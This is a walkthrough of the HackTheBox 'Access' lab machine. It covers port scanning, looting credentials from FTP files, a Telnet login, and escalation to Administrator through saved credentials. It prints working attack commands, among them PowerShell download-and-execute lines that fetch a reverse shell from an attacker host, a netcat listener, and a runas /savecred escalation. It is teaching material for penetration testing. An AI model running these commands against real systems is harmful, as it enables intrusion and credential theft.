How are you doing?
This time I will show you how to root the ‘Access’ VM from HackTheBox.
Like other topics, I will focus on the methodology and the steps which were required to root the box on your own successfully.
Table of contents
1. Port scanning 2. Port filtering 3. Service enumeration 4. FTP 5. Telnet 6. HTTP 7. Analyse Microsoft Access Database 8. ZIP File extraction 9. Telnet Login 10. Reverse Shell through PowerShell 11. Local enumeration 12. Privilege Escalation 13. Challenge
1. Ping & Port Scanning
As always, I like to start to scan the machine just for open ports. We need an overview of our target. Because we don’t know how our target was configured, we should do small steps. So let us ping the machine.
ping -c 3 10.10.10.98
Notice the TTL (Time-To-Live) is 127. But what is TTL?
Do some research and try to find out on your own.
You should practice it!
When you find the information you need, then you can go forward.
But what do we need to know?
This is a great question and to become better, and it’s necessary to be able to find the solution on your own. So take a step back and create an overview for yourself. Also, you should ask yourself:
What do I need?
What is my goal (for this part!)?
It’s always easy if you see the solution. Every machine looks pretty easy if you know how to root it. The most difficult part of it is to find a way into it on your own.
So do some research before you continue.
Some useful resources you should find are:
Now we know that the OS is most likely a Windows.
Let us enumerate the open ports of this machine by using Nmap.
If you’re not familiar with Nmap, you should do some research. It is an essential tool which the most Penetration Testers are using.
nmap 10.10.10.98 -Pn -n -p- --open -oN allports.nmap --stats-every 30s --max-retries 2 -T5
Alright, what do we have so far?
- OS: Windows (most likely)
2. Port filtering
It’s possible that you will discover much more open ports on other machines and it could be a pain to type them manually.
Let us filter these by using Bash.
cat allports.nmap | grep tcp | cut -d"/" -f1 | tr “\n” “,” | sed ‘s/.$//g’
If you don’t understand the command, you can visit this site to get a better understanding of it: https://explainshell.com/
Now we can save the output of it in a variable.
PORTS=$(cat allports.nmap | grep tcp | cut -d"/" -f1 | tr “\n” “,” | sed ‘s/.$//g’)
To verify it looks great, we should ‘echo’ it.
And now we can proceed.
3. Service enumeration
Service enumeration is the part where we try to find out more information about the running services. Enumeration doesn’t mean only to collect as much information as possible moreover you have to create an overview based on all the information you had received.
Let us use Nmap for service scan and the Nmap Scripting Engine (NSE) to collect more information about the running services.
nmap 10.10.10.98 -p$PORTS -sV -sC -oN services.nmap --stats-every 30s --max-retries 2
So here is how our results look like:
Look at the information we’ve got so far closely.
Every information in this result is crucial for us.
You should append the info we just found out to our previous overview.
You also should notice the Telnet line. Take a closer look at it. What exactly do you see there?
There is a question mark. Right. What could this mean?
[Important] Train your research skills and try to find it out on your own.
Sometimes it can be essential to search for information like this little thing.
Let us take a look at the FTP server. You should notice from the previous Nmap scan that we have ‘Anonymous login allowed’. So let’s use it.
By looking into these directories, we found some interesting files.
Now we have to download it. I will show you two different methods you can do it.
We can use FTP with the ‘get’ command, or we use ‘wget’ to download these files.
But first, we have to still organised. So we create an FTP directory where we will store the files.
You should read the manual of ‘wget’ to understand the command and find out what PASV mode of an FTP server is.
Before we begin to analyse the files let us enumerate the other services too.
Did you find out what the question mark means?
Now we will take a look at this service by using telnet.
You will notice that it will take a few seconds before the login prompt appears.
That is the reason for the question mark at the Nmap scan. Nmap couldn’t determine this service as Telnet because the response took to long. But because Telnet is basically on TCP port 23 it gave us the output of maybe it’s Telnet.
We don’t have any credentials to log in yet and to start bruteforcing this service just doesn’t make sense without any information of the ‘organisation’ or the machine we are trying to root. If we shouldn’t find any useful information than we can try to bruteforce it, but now let us take a look at the Web server.
First, we should just interact with the Web server. Let us visit it.
Here we can download the image for later analysis.
Also, we want to know how the header looks like. Which ‘OPTIONS’ are allowed?.
The questions you should ask yourself:
- Are there some security headers?
- What kind of security headers exists?
Again, train your research skills and learn new things. Use all search engines and methods you know to find out the information you don’t know.
From this point, we want to spider the Web server to find out which directories on it exist.
Therefore we will use Burp Suite.
After setting up our Proxy-Settings and configure our target in Burp we can send another GET request to the Web server and intercept it. By sending it to spider in Burp, it will hopefully find some useful files or directories.
By clicking on Action you can send the request to Spider in Burp.
Burp Spider is a crawler which will be used to map a Web server (learn more).
Now our results look like we don’t have much here:
From here we can make another step and bruteforce the Web server with GET requests for different files and directories. There exist a lot of tools out there like gobuster, dirbuster, dirb and dirsearch.
At this example, I will use dirsearch. It isn’t installed in Kali Linux by default.
So here is the resource for dirsearch where you can download it.
You can download it by using the following command:
git clone https://github.com/maurosoria/dirsearch.git /opt/dirsearch/
Also, to make it globally executable you can create a symbolic link to
ln -s /opt/dirsearch/dirsearch.py /usr/local/bin/dirsearch
you will see all the options it has. Now let us enumerate the Web server with it.
dirsearch -u http://10.10.10.98 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 10 --max-retries=2 -e html,jpg,png,xml,aspx,asp,htm,asmx,dll,db
Unfortunately, nothing is interesting in the Web server. Another tool we can use is nikto.
This will provide us with a lot of information:
You should always note all of the information we collected so far during the process.
Let’s move on.
7. Microsoft Access Database
At this point, we should determine the file types of the files we are working with.
This could be done with a tool called ‘file’.
file Access\ Control.zip
Another method to find more information we can use ‘exiftool’.
Notice that ‘exiftool’ couldn’t determine the file type. So we have to do it manually.
Ok Google: mdb file
On the first result page, you will be able to find this URL: https://fileinfo.com/extension/mdb
It provides us with the information we need.
I can’t repeat it often enough: note it!
Ok, Google: extract mdb data kali
Here you will find a website called http://mdbtools.sourceforge.net/install/x53.htm.
By using ‘mdbtools’ we can work with this file. Let us take a look at how it does look inside.
Ok. We have to structure it to make it easily readable.
We see the
auth_user table inside. Let’s export the data from this table.
mdb-export backup.mdb auth_user | tr “,” " " | grep “\”" | cut -d" " -f2-3 | sed ‘s/\"//g’ | tr " " “:”
Also, we should save this information.
mdb-export backup.mdb auth_user | tr “,” " " | grep “\”" | cut -d" " -f2-3 | sed ‘s/\"//g’ | tr " " “:” > creds.txt
Another way we can use is the following:
mdb-export backup.mdb auth_user | tr “,” " " | column -t
8. ZIP File extraction
Next file is our ZIP archive. We want to know what’s inside of it.
unzip Access\ Control.zip
Do some research. Find out why this error appears.
7z -e Access\ Control.zip
Now it’s asking us for a password. Did we find some credentials already?
Let us try to use them:
We extracted a file called ‘Access Control.pst’. What kind of file is it?
file Access\ Control.pst
Find out a way on your own to read the content.
cat ‘Access Control.mbox’ | head -n 25
9. Telnet Login
At this point, we found other credentials which we can use.
Let us try to log in by using these.
We could successfully log in by using the credentials we found from the ZIP file.
Now it’s time for local enumeration, but first, it’s always better to work with a reverse shell.
Make sure you understand how a reverse shell works because it’s an essential part in this whole area.
10. Reverse Shell through PowerShell
But before we can obtain a reverse shell we have to plan it, understand how it should work and how the whole scenario of it will look like.
We have to force our target to connect back to us. …(cough) firewalls (cough)…
What do we need:
- Reverse shell script
- Web server
- Execution command
1. Reverse shell Script
Nishang created an excellent collection of different PowerShell scripts. One of these we will use to obtain our reverse shell. We will copy it to our working directory.
We want to make sure that our target machine will execute it directly. Here we have to make some changes for that. By looking into the reverse shell script, we will see an example:
We will copy this line at the end of the file and remove the “PS >”. After these changes it will look like this:
2. Web server
There exist a lot of methods to share files. We will use this time a Python3 Web server module in the directory we stored our script.
python3 -m http.server 80
After that, we have to start our listener and listen on the port we set in the script before. In my case, it was the TCP port 2201. Therefore I will use Netcat.
nc -nlvp 2201
4. Execution command
The execution command for this will be:
C:\Users\security> powershell -c IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.5/revshell.ps1’)
11. Local enumeration
411Hall created an awesome enumeration PowerShell script called JAWS to identify privilege escalation vectors quickly.
We will let our target system download and execute it the same way we did it with the reverse shell.
It will take a few minutes. So don’t quit the session.
The most interesting part is this one:
Also, let us take a look at the desktop of the ‘security’ user.
So it seems we have here some stored credentials for the Administrator on this machine.
If we don’t know how to export them what else could we do?
12. Privilege Escalation
Let us ask Google:
Ok, Google: windows currently stored credentials privilege escalation
Also here on the first page, you will find a GitHub repository of swisskyrepo to his Windows - Privilege Escalation cheat sheet.
If we press CTRL+F and search for “stored credentials” you will see this example:
Ok. Do we need an EXE file or can we do something else?
What do you think about another reverse shell but this time with Administrator privileges?
Go back to 10. Reverse Shell through PowerShell if you don’t know how it does work or how it should look like. But I think this should be clear right now. It’s the same scenario in this situation.
- We will just change the TCP port of our reverse shell script to 2202.
- Run our python web server.
- Set up our listener on TCP port 2202.
- Execute it the same way with PowerShell with the currently stored credentials.
1. Reverse Shell Script
2. Web server
python3 -m http.server 80
nc -nlvp 2202
4. Execution command
PS C:\Users\security> runas /savecred /user:ACCESS\Administrator “powershell.exe IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.5/revshell.ps1’)”
For this challenge, your goals will be
- A Meterpreter session
- Upload Mimikatz and read the credentials
- The usage of Empire or their scripts for this challenge is forbidden.
YouTube video coming soon!
Official Website: https://www.shell-affect.com